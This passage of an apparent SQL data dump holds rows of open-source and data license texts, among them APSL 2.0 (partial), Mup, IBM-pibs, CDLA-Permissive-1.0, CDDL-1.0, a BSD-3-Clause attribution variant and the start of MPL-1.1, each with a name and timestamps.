Notwithstanding\nthe foregoing, if applicable law prohibits or restricts You from fully and/or\nspecifically complying with Sections 2 and/or 3 or prevents the enforceability\nof either of those Sections, this License will immediately terminate and You\nmust immediately discontinue any use of the Covered Code and destroy all copies\nof it that are in your possession or control.\n\n13.6 Dispute Resolution. Any litigation or other dispute resolution between\nYou and Apple relating to this License shall take place in the Northern District\nof California, and You and Apple hereby consent to the personal jurisdiction\nof, and venue in, the state and federal courts within that District with respect\nto this License. The application of the United Nations Convention on Contracts\nfor the International Sale of Goods is expressly excluded.\n\n13.7 Entire Agreement; Governing Law. This License constitutes the entire\nagreement between the parties with respect to the subject matter hereof. This\nLicense shall be governed by the laws of the United States and the State of\nCalifornia, except that body of California law concerning conflicts of law.\n\nWhere You are located in the province of Quebec, Canada, the following clause\napplies: The parties hereby confirm that they have requested that this License\nand all related documents be drafted in English. Les parties ont exigé que\nle présent contrat et tous les documents connexes soient rédigés en anglais.\nEXHIBIT A.\n\n\"Portions Copyright (c) 1999-2007 Apple Inc. All Rights Reserved.\n\nThis file contains Original Code and/or Modifications of Original Code as\ndefined in and that are subject to the Apple Public Source License Version\n2.0 (the \'License\'). You may not use this file except in compliance with the\nLicense. Please obtain a copy of the License at http://www.opensource.apple.com/apsl/\nand read it before using this file.\n\nThe Original Code and all software distributed under the License are distributed\non an \'AS IS\' basis, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED,\nAND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, INCLUDING WITHOUT LIMITATION,\nANY WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, QUIET\nENJOYMENT OR NON-INFRINGEMENT. Please see the License for the specific language\ngoverning rights and limitations under the License.\"\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(38,'Mup','Copyright (c) 1995-2012 by Arkkra Enterprises. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following DISCLAIMER.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following DISCLAIMER in the documentation\nand/or other materials provided with the distribution.\n\n3. Any additions, deletions, or changes to the original files must be clearly\nindicated in accompanying documentation. including the reasons for the changes,\nand the names of those who made the modifications.\n\nDISCLAIMER\n\nTHIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(39,'IBM-pibs','This source code has been made available to you by IBM on an AS-IS basis.\nAnyone receiving this source is licensed under IBM copyrights to use it in\nany way he or she deems fit, including copying it, modifying it, compiling\nit, and redistributing it either with or without modifications. No license\nunder IBM patents or patent applications is to be implied by the copyright\nlicense.\n\nAny user of this software should understand that IBM cannot provide technical\nsupport for this software and will not be responsible for any consequences\nresulting from the use of this software.\n\nAny person who transfers this source code or any derivative work must include\nthe IBM copyright notice, this paragraph, and the preceding two paragraphs\nin the transferred software.\n\nCOPYRIGHT I B M CORPORATION 2002\n\nLICENSED MATERIAL - PROGRAM PROPERTY OF I B M\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(40,'gnu-javamail-exception','As a special exception, if you link this library with other files to produce an executable, this library does not by itself cause the resulting executable to be covered by the GNU General Public License. This exception does not however invalidate any other reasons why the executable file might be covered by the GNU General Public License.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(41,'CDLA-Permissive-1.0','Community Data License Agreement - Permissive - Version 1.0\n\nThis is the Community Data License Agreement - Permissive, Version 1.0 (\"Agreement\").\nData is provided to You under this Agreement by each of the Data Providers.\nYour exercise of any of the rights and permissions granted below constitutes\nYour acceptance and agreement to be bound by the terms and conditions of this\nAgreement.\n\nThe benefits that each Data Provider receives from making Data available and\nthat You receive from Data or otherwise under these terms and conditions shall\nbe deemed sufficient consideration for the formation of this Agreement. Accordingly,\nData Provider(s) and You (the \"Parties\") agree as follows:\n\n Section 1. Definitions\n\n1.1 \"Add\" means to supplement Data with Your own or someone else\'s Data, resulting\nin Your \"Additions.\" Additions do not include Results.\n\n1.2 \"Computational Use\" means Your analysis (through the use of computational\ndevices or otherwise) or other interpretation of Data. By way of example and\nnot limitation, \"Computational Use\" includes the application of any computational\nanalytical technique, the purpose of which is the analysis of any Data in\ndigital form to generate information about Data such as patterns, trends,\ncorrelations, inferences, insights and attributes.\n\n1.3 \"Data\" means the information (including copyrightable information, such\nas images or text), collectively or individually, whether created or gathered\nby a Data Provider or an Entity acting on its behalf, to which rights are\ngranted under this Agreement.\n\n1.4 \"Data Provider\" means any Entity (including any employee or contractor\nof such Entity authorized to Publish Data on behalf of such Entity) that Publishes\nData under this Agreement prior to Your Receiving it.\n\n1.5 \"Enhanced Data\" means the subset of Data that You Publish and that is\ncomposed of (a) Your Additions and/or (b) Modifications to Data You have received\nunder this Agreement.\n\n1.6 \"Entity\" means any natural person or organization that exists under the\nlaws of the jurisdiction in which it is organized, together with all other\nentities that control, are controlled by, or are under common control with\nthat entity. For the purposes of this definition, \"control\" means (a) the\npower, directly or indirectly, to cause the direction or management of such\nentity, whether by contract or otherwise, (b) the ownership of more than fifty\npercent (50%) of the outstanding shares or securities, (c) the beneficial\nownership of such entity or, (d) the ability to appoint, whether by agreement\nor right, the majority of directors of an Entity.\n\n1.7 \"Modify\" means to delete, erase, correct or re-arrange Data, resulting\nin \"Modifications.\" Modifications do not include Results.\n\n1.8 \"Publish\" means to make all or a subset of Data (including Your Enhanced\nData) available in any manner which enables its Use, including by providing\na copy on physical media or remote access. For any form of Entity, that is\nto make the Data available to any individual who is not employed by that Entity\nor engaged as a contractor or agent to perform work on that Entity\'s behalf.\nA \"Publication\" occurs each time You Publish Data.\n\n1.9 \"Receive\" or \"Receives\" means to have been given access to Data, locally\nor remotely.\n\n1.10 \"Results\" means the outcomes or outputs that You obtain from Your Computational\nUse of Data. Results shall not include more than a de minimis portion of the\nData on which the Computational Use is based.\n\n1.11 \"Sui Generis Database Rights\" means rights, other than copyright, resulting\nfrom Directive 96/9/EC of the European Parliament and of the Council of 11\nMarch 1996 on the legal protection of databases, as amended and/or succeeded,\nas well as other equivalent rights anywhere in the world.\n\n1.12 \"Use\" means using Data (including accessing, copying, studying, reviewing,\nadapting, analyzing, evaluating, or making Computational Use of it), either\nby machines or humans, or a combination of both.\n\n1.13 \"You\" or \"Your\" means any Entity that Receives Data under this Agreement.\n\n Section 2. Right and License to Use and to Publish\n\n2.1 Subject to the conditions set forth in Section 3 of this Agreement, Data\nProvider(s) hereby grant(s) to You a worldwide, non-exclusive, irrevocable\n(except as provided in Section 5) right to: (a) Use Data; and (b) Publish\nData.\n\n2.2 To the extent that the Data or the coordination, selection or arrangement\nof Data is protected or protectable under copyright, Sui Generis Database\nRights, or other law, Data Provider(s) further agree(s) that such Data or\ncoordination, selection or arrangement is hereby licensed to You and to anyone\nelse who Receives Data under this Agreement for Use and Publication, subject\nto the conditions set forth in Section 3 of this Agreement.\n\n2.3 Except for these rights and licenses expressly granted, no other intellectual\nproperty rights are granted or should be implied.\n\n Section 3. Conditions on Rights Granted\n\n 3.1 If You Publish Data You Receive or Enhanced Data:\n\n(a) You may do so under a license of Your choice provided that You give anyone\nwho Receives the Data from You the text of this Agreement, the name of this\nAgreement and/or a hyperlink or other method reasonably likely to provide\na copy of the text of this Agreement; and\n\n(b) You must cause any Data files containing Enhanced Data to carry prominent\nnotices that You have changed those files; and\n\n(c) If You Publish Data You Receive, You must preserve all credit or attribution\nto the Data Provider(s). Such retained credit or attribution includes any\nof the following to the extent they exist in Data as You have Received it:\nlegal notices or metadata; identification of the Data Provider(s); or hyperlinks\nto Data to the extent it is practical to do so.\n\n3.2 You may provide additional or different license terms and conditions for\nuse, reproduction, or distribution of that Enhanced Data, or for any combination\nof Data and Enhanced Data as a whole, provided that Your Use and Publication\nof that combined Data otherwise complies with the conditions stated in this\nLicense.\n\n3.3 You and each Data Provider agree that Enhanced Data shall not be considered\na work of joint authorship by virtue of its relationship to Data licensed\nunder this Agreement and shall not require either any obligation of accounting\nto or the consent of any Data Provider.\n\n3.4 This Agreement imposes no obligations or restrictions on Your Use or Publication\nof Results.\n\n Section 4. Data Provider(s)\' Representations\n\n4.1 Each Data Provider represents that the Data Provider has exercised reasonable\ncare, to assure that: (a) the Data it Publishes was created or generated by\nit or was obtained from others with the right to Publish the Data under this\nAgreement; and (b) Publication of such Data does not violate any privacy or\nconfidentiality obligation undertaken by the Data Provider.\n\n Section 5. Termination\n\n5.1 All of Your rights under this Agreement will terminate, and Your right\nto Receive, Use or Publish the Data will be revoked or modified if You materially\nfail to comply with the terms and conditions of this Agreement and You do\nnot cure such failure in a reasonable period of time after becoming aware\nof such noncompliance. If Your rights under this Agreement terminate, You\nagree to cease Receipt, Use and Publication of Data. However, Your obligations\nand any rights and permissions granted by You under this Agreement relating\nto Data that You Published prior to such termination will continue and survive.\n\n5.2 If You institute litigation against a Data Provider or anyone else who\nReceives the Data (including a cross-claim in a lawsuit) based on the Data,\nother than a claim asserting breach of this Agreement, then any rights previously\ngranted to You to Receive, Use and Publish Data under this Agreement will\nterminate as of the date such litigation is filed.\n\n Section 6. Disclaimer of Warranties and Limitation of Liability\n\n6.1 EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, THE DATA (INCLUDING ENHANCED\nDATA) IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\nANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES\nOR CONDITIONS OF TITLE, NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A\nPARTICULAR PURPOSE.\n\n6.2 NEITHER YOU NOR ANY DATA PROVIDERS SHALL HAVE ANY LIABILITY FOR ANY DIRECT,\nINDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING\nWITHOUT LIMITATION LOST PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\nWHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OR DISTRIBUTION OF THE DATA OR THE EXERCISE\nOF ANY RIGHTS GRANTED HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\nDAMAGES.\n\n Section 7. Miscellaneous\n\n7.1 You agree that it is solely Your responsibility to comply with all applicable\nlaws with regard to Your Use or Publication of Data, including any applicable\nprivacy, data protection, security and export laws. You agree to take reasonable\nsteps to assist a Data Provider fulfilling responsibilities to comply with\napplicable laws with regard to Use or Publication of Data Received hereunder.\n\n7.2 You and Data Provider(s), collectively and individually, waive and/or\nagree not to assert, to the extent permitted by law, any moral rights You\nor they hold in Data.\n\n7.3 This Agreement confers no rights or remedies upon any person or entity\nother than the Parties and their respective heirs, executors, successors and\nassigns.\n\n7.4 The Data Provider(s) reserve no right or expectation of privacy, data\nprotection or confidentiality in any Data that they Publish under this Agreement.\nIf You choose to Publish Data under this Agreement, You similarly do so with\nno reservation or expectation of any rights of privacy or confidentiality\nin that Data.\n\n7.5 The Community Data License Agreement workgroup under The Linux Foundation\nis the steward of this Agreement (\"Steward\"). No one other than the Steward\nhas the right to modify or publish new versions of this Agreement. Each version\nwill be given a distinguishing version number. You may Use and Publish Data\nReceived hereunder under the terms of the version of the Agreement under which\nYou originally Received the Data, or under the terms of any subsequent version\npublished by the Steward.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(42,'CDDL-1.0','COMMON DEVELOPMENT AND DISTRIBUTION LICENSE (CDDL)\n\nVersion 1.0\n\n 1. Definitions.\n\n1.1. \"Contributor\" means each individual or entity that creates or contributes\nto the creation of Modifications.\n\n1.2. \"Contributor Version\" means the combination of the Original Software,\nprior Modifications used by a Contributor (if any), and the Modifications\nmade by that particular Contributor.\n\n1.3. \"Covered Software\" means (a) the Original Software, or (b) Modifications,\nor (c) the combination of files containing Original Software with files containing\nModifications, in each case including portions thereof.\n\n1.4. \"Executable\" means the Covered Software in any form other than Source\nCode.\n\n1.5. \"Initial Developer\" means the individual or entity that first makes Original\nSoftware available under this License.\n\n1.6. \"Larger Work\" means a work which combines Covered Software or portions\nthereof with code not governed by the terms of this License.\n\n 1.7. \"License\" means this document.\n\n1.8. \"Licensable\" means having the right to grant, to the maximum extent possible,\nwhether at the time of the initial grant or subsequently acquired, any and\nall of the rights conveyed herein.\n\n1.9. \"Modifications\" means the Source Code and Executable form of any of the\nfollowing:\n\nA. Any file that results from an addition to, deletion from or modification\nof the contents of a file containing Original Software or previous Modifications;\n\nB. Any new file that contains any part of the Original Software or previous\nModification; or\n\nC. Any new file that is contributed or otherwise made available under the\nterms of this License.\n\n1.10. \"Original Software\" means the Source Code and Executable form of computer\nsoftware code that is originally released under this License.\n\n1.11. \"Patent Claims\" means any patent claim(s), now owned or hereafter acquired,\nincluding without limitation, method, process, and apparatus claims, in any\npatent Licensable by grantor.\n\n1.12. \"Source Code\" means (a) the common form of computer software code in\nwhich modifications are made and (b) associated documentation included in\nor with such code.\n\n1.13. \"You\" (or \"Your\") means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License. For legal entities,\n\"You\" includes any entity which controls, is controlled by, or is under common\ncontrol with You. For purposes of this definition, \"control\" means (a) the\npower, direct or indirect, to cause the direction or management of such entity,\nwhether by contract or otherwise, or (b) ownership of more than fifty percent\n(50%) of the outstanding shares or beneficial ownership of such entity.\n\n 2. License Grants.\n\n 2.1. The Initial Developer Grant.\n\nConditioned upon Your compliance with Section 3.1 below and subject to third\nparty intellectual property claims, the Initial Developer hereby grants You\na world-wide, royalty-free, non-exclusive license:\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Initial Developer, to use, reproduce, modify, display, perform, sublicense\nand distribute the Original Software (or portions thereof), with or without\nModifications, and/or as part of a Larger Work; and\n\n(b) under Patent Claims infringed by the making, using or selling of Original\nSoftware, to make, have made, use, practice, sell, and offer for sale, and/or\notherwise dispose of the Original Software (or portions thereof).\n\n(c) The licenses granted in Sections 2.1(a) and (b) are effective on the date\nInitial Developer first distributes or otherwise makes the Original Software\navailable to a third party under the terms of this License.\n\n(d) Notwithstanding Section 2.1(b) above, no patent license is granted: (1)\nfor code that You delete from the Original Software, or (2) for infringements\ncaused by: (i) the modification of the Original Software, or (ii) the combination\nof the Original Software with other software or devices.\n\n 2.2. Contributor Grant.\n\nConditioned upon Your compliance with Section 3.1 below and subject to third\nparty intellectual property claims, each Contributor hereby grants You a world-wide,\nroyalty-free, non-exclusive license:\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Contributor to use, reproduce, modify, display, perform, sublicense and\ndistribute the Modifications created by such Contributor (or portions thereof),\neither on an unmodified basis, with other Modifications, as Covered Software\nand/or as part of a Larger Work; and\n\n(b) under Patent Claims infringed by the making, using, or selling of Modifications\nmade by that Contributor either alone and/or in combination with its Contributor\nVersion (or portions of such combination), to make, use, sell, offer for sale,\nhave made, and/or otherwise dispose of: (1) Modifications made by that Contributor\n(or portions thereof); and (2) the combination of Modifications made by that\nContributor with its Contributor Version (or portions of such combination).\n\n(c) The licenses granted in Sections 2.2(a) and 2.2(b) are effective on the\ndate Contributor first distributes or otherwise makes the Modifications available\nto a third party.\n\n(d) Notwithstanding Section 2.2(b) above, no patent license is granted: (1)\nfor any code that Contributor has deleted from the Contributor Version; (2)\nfor infringements caused by: (i) third party modifications of Contributor\nVersion, or (ii) the combination of Modifications made by that Contributor\nwith other software (except as part of the Contributor Version) or other devices;\nor (3) under Patent Claims infringed by Covered Software in the absence of\nModifications made by that Contributor.\n\n 3. Distribution Obligations.\n\n 3.1. Availability of Source Code.\n\nAny Covered Software that You distribute or otherwise make available in Executable\nform must also be made available in Source Code form and that Source Code\nform must be distributed only under the terms of this License. You must include\na copy of this License with every copy of the Source Code form of the Covered\nSoftware You distribute or otherwise make available. You must inform recipients\nof any such Covered Software in Executable form as to how they can obtain\nsuch Covered Software in Source Code form in a reasonable manner on or through\na medium customarily used for software exchange.\n\n 3.2. Modifications.\n\nThe Modifications that You create or to which You contribute are governed\nby the terms of this License. You represent that You believe Your Modifications\nare Your original creation(s) and/or You have sufficient rights to grant the\nrights conveyed by this License.\n\n 3.3. Required Notices.\n\nYou must include a notice in each of Your Modifications that identifies You\nas the Contributor of the Modification. You may not remove or alter any copyright,\npatent or trademark notices contained within the Covered Software, or any\nnotices of licensing or any descriptive text giving attribution to any Contributor\nor the Initial Developer.\n\n 3.4. Application of Additional Terms.\n\nYou may not offer or impose any terms on any Covered Software in Source Code\nform that alters or restricts the applicable version of this License or the\nrecipients\' rights hereunder. You may choose to offer, and to charge a fee\nfor, warranty, support, indemnity or liability obligations to one or more\nrecipients of Covered Software. However, you may do so only on Your own behalf,\nand not on behalf of the Initial Developer or any Contributor. You must make\nit absolutely clear that any such warranty, support, indemnity or liability\nobligation is offered by You alone, and You hereby agree to indemnify the\nInitial Developer and every Contributor for any liability incurred by the\nInitial Developer or such Contributor as a result of warranty, support, indemnity\nor liability terms You offer.\n\n 3.5. Distribution of Executable Versions.\n\nYou may distribute the Executable form of the Covered Software under the terms\nof this License or under the terms of a license of Your choice, which may\ncontain terms different from this License, provided that You are in compliance\nwith the terms of this License and that the license for the Executable form\ndoes not attempt to limit or alter the recipient\'s rights in the Source Code\nform from the rights set forth in this License. If You distribute the Covered\nSoftware in Executable form under a different license, You must make it absolutely\nclear that any terms which differ from this License are offered by You alone,\nnot by the Initial Developer or Contributor. You hereby agree to indemnify\nthe Initial Developer and every Contributor for any liability incurred by\nthe Initial Developer or such Contributor as a result of any such terms You\noffer.\n\n 3.6. Larger Works.\n\nYou may create a Larger Work by combining Covered Software with other code\nnot governed by the terms of this License and distribute the Larger Work as\na single product. In such a case, You must make sure the requirements of this\nLicense are fulfilled for the Covered Software.\n\n 4. Versions of the License.\n\n 4.1. New Versions.\n\nSun Microsystems, Inc. is the initial license steward and may publish revised\nand/or new versions of this License from time to time. Each version will be\ngiven a distinguishing version number. Except as provided in Section 4.3,\nno one other than the license steward has the right to modify this License.\n\n 4.2. Effect of New Versions.\n\nYou may always continue to use, distribute or otherwise make the Covered Software\navailable under the terms of the version of the License under which You originally\nreceived the Covered Software. If the Initial Developer includes a notice\nin the Original Software prohibiting it from being distributed or otherwise\nmade available under any subsequent version of the License, You must distribute\nand make the Covered Software available under the terms of the version of\nthe License under which You originally received the Covered Software. Otherwise,\nYou may also choose to use, distribute or otherwise make the Covered Software\navailable under the terms of any subsequent version of the License published\nby the license steward.\n\n 4.3. Modified Versions.\n\nWhen You are an Initial Developer and You want to create a new license for\nYour Original Software, You may create and use a modified version of this\nLicense if You: (a) rename the license and remove any references to the name\nof the license steward (except to note that the license differs from this\nLicense); and (b) otherwise make it clear that the license contains terms\nwhich differ from this License.\n\n 5. DISCLAIMER OF WARRANTY.\n\nCOVERED SOFTWARE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT\nWARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES THAT THE COVERED SOFTWARE IS FREE OF DEFECTS, MERCHANTABLE, FIT\nFOR A PARTICULAR PURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY\nAND PERFORMANCE OF THE COVERED SOFTWARE IS WITH YOU. SHOULD ANY COVERED SOFTWARE\nPROVE DEFECTIVE IN ANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER\nCONTRIBUTOR) ASSUME THE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION.\nTHIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE.\nNO USE OF ANY COVERED SOFTWARE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 6. TERMINATION.\n\n6.1. This License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. Provisions which, by their nature,\nmust remain in effect beyond the termination of this License shall survive.\n\n6.2. If You assert a patent infringement claim (excluding declaratory judgment\nactions) against Initial Developer or a Contributor (the Initial Developer\nor Contributor against whom You assert such claim is referred to as \"Participant\")\nalleging that the Participant Software (meaning the Contributor Version where\nthe Participant is a Contributor or the Original Software where the Participant\nis the Initial Developer) directly or indirectly infringes any patent, then\nany and all rights granted directly or indirectly to You by such Participant,\nthe Initial Developer (if the Initial Developer is not the Participant) and\nall Contributors under Sections 2.1 and/or 2.2 of this License shall, upon\n60 days notice from Participant terminate prospectively and automatically\nat the expiration of such 60 day notice period, unless if within such 60 day\nperiod You withdraw Your claim with respect to the Participant Software against\nsuch Participant either unilaterally or pursuant to a written agreement with\nParticipant.\n\n6.3. In the event of termination under Sections 6.1 or 6.2 above, all end\nuser licenses that have been validly granted by You or any distributor hereunder\nprior to termination (excluding licenses granted to You by any distributor)\nshall survive termination.\n\n 7. LIMITATION OF LIABILITY.\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL YOU, THE INITIAL DEVELOPER, ANY\nOTHER CONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED SOFTWARE, OR ANY SUPPLIER\nOF ANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY INDIRECT, SPECIAL,\nINCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION,\nDAMAGES FOR LOST PROFITS, LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE\nOR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF\nSUCH PARTY SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS\nLIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL\nINJURY RESULTING FROM SUCH PARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW\nPROHIBITS SUCH LIMITATION. SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR\nLIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION\nMAY NOT APPLY TO YOU.\n\n 8. U.S. GOVERNMENT END USERS.\n\nThe Covered Software is a \"commercial item,\" as that term is defined in 48\nC.F.R. 2.101 (Oct. 1995), consisting of \"commercial computer software\" (as\nthat term is defined at 48 C.F.R. § 252.227-7014(a)(1)) and \"commercial computer\nsoftware documentation\" as such terms are used in 48 C.F.R. 12.212 (Sept.\n1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through 227.7202-4\n(June 1995), all U.S. Government End Users acquire Covered Software with only\nthose rights set forth herein. This U.S. Government Rights clause is in lieu\nof, and supersedes, any other FAR, DFAR, or other clause or provision that\naddresses Government rights in computer software under this License.\n\n 9. MISCELLANEOUS.\n\nThis License represents the complete agreement concerning subject matter hereof.\nIf any provision of this License is held to be unenforceable, such provision\nshall be reformed only to the extent necessary to make it enforceable. This\nLicense shall be governed by the law of the jurisdiction specified in a notice\ncontained within the Original Software (except to the extent applicable law,\nif any, provides otherwise), excluding such jurisdiction\'s conflict-of-law\nprovisions. Any litigation relating to this License shall be subject to the\njurisdiction of the courts located in the jurisdiction and venue specified\nin a notice contained within the Original Software, with the losing party\nresponsible for costs, including, without limitation, court costs and reasonable\nattorneys\' fees and expenses. The application of the United Nations Convention\non Contracts for the International Sale of Goods is expressly excluded. Any\nlaw or regulation which provides that the language of a contract shall be\nconstrued against the drafter shall not apply to this License. You agree that\nYou alone are responsible for compliance with the United States export administration\nregulations (and the export control laws and regulation of any other countries)\nwhen You use, distribute or otherwise make available any Covered Software.\n\n 10. RESPONSIBILITY FOR CLAIMS.\n\nAs between Initial Developer and the Contributors, each party is responsible\nfor claims and damages arising, directly or indirectly, out of its utilization\nof rights under this License and You agree to work with Initial Developer\nand Contributors to distribute such responsibility on an equitable basis.\nNothing herein is intended or shall be deemed to constitute any admission\nof liability.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(43,'BSD-3-Clause-Attribution','Redistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. Neither the name of the copyright holder nor the names of its contributors\nmay be used to endorse or promote products derived from this software without\nspecific prior written permission.\n\n4. Redistributions of any form whatsoever must retain the following acknowledgment:\n\'This product includes software developed by the \"Universidad de Palermo,\nArgentina\" (http://www.palermo.edu/).\'\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(44,'MPL-1.1','Mozilla Public License Version 1.1\n\n 1. Definitions.\n\n1.0.1. \"Commercial Use\" means distribution or otherwise making the Covered\nCode available to a third party.\n\n1.1. \"Contributor\" means each entity that creates or contributes to the creation\nof Modifications.\n\n1.2. \"Contributor Version\" means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.3. \"Covered Code\" means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof.\n\n1.4. \"Electronic Distribution Mechanism\" means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n 1.5. \"Executable\" means Covered Code in any form other than Source Code.\n\n1.6. \"Initial Developer\" means the individual or entity identified as the\nInitial Developer in the Source Code notice required by Exhibit A.\n\n1.7. \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n 1.8. \"License\" means this document.\n\n1.8.1. \"Licensable\" means having the right to grant, to the maximum extent\npossible, whether at the time of the initial grant or subsequently acquired,\nany and all of the rights conveyed herein.\n\n1.9. \"Modifications\" means any addition to or deletion from the substance\nor structure of either the Original Code or any previous Modifications. When\nCovered Code is released as a series of files, a Modification is:\n\nAny addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nAny new file that contains any part of the Original Code or previous Modifications.\n\n1.10. \"Original Code\" means Source Code of computer software code which is\ndescribed in the Source Code notice required by Exhibit A as Original Code,\nand which, at the time of its release under this License is not already Covered\nCode governed by this License.\n\n1.10.1. \"Patent Claims\" means any patent claim(s), now owned or hereafter\nacquired, including without limitation, method, process, and apparatus claims,\nin any patent Licensable by grantor.\n\n1.11. \"Source Code\" means the preferred form of the Covered Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof an Executable, or source code differential comparisons against either the\nOriginal Code or another well known, available Covered Code of the Contributor\'s\nchoice. The Source Code can be in a compressed or archival form, provided\nthe appropriate decompression or de-archiving software is widely available\nfor no charge.\n\n1.12. \"You\" (or \"Your\") means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License or a future version\nof this License issued under Section 6.1. For legal entities, \"You\" includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, \"control\" means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of more than fifty percent (50%)\nof the outstanding shares or beneficial ownership of such entity.\n\n 2. Source Code License.\n\n2.1. The Initial Developer Grant. The Initial Developer hereby grants You\na world-wide, royalty-free, non-exclusive license, subject to third party\nintellectual property claims:\n\na. under intellectual property rights (other than patent or trademark) Licensable\nby Initial Developer to use, reproduce, modify, display, perform, sublicense\nand distribute the Original Code (or portions thereof) with or without Modifications,\nand/or as part of a Larger Work; and\n\nb. under Patents Claims infringed by the making, using or selling of Original\nCode, 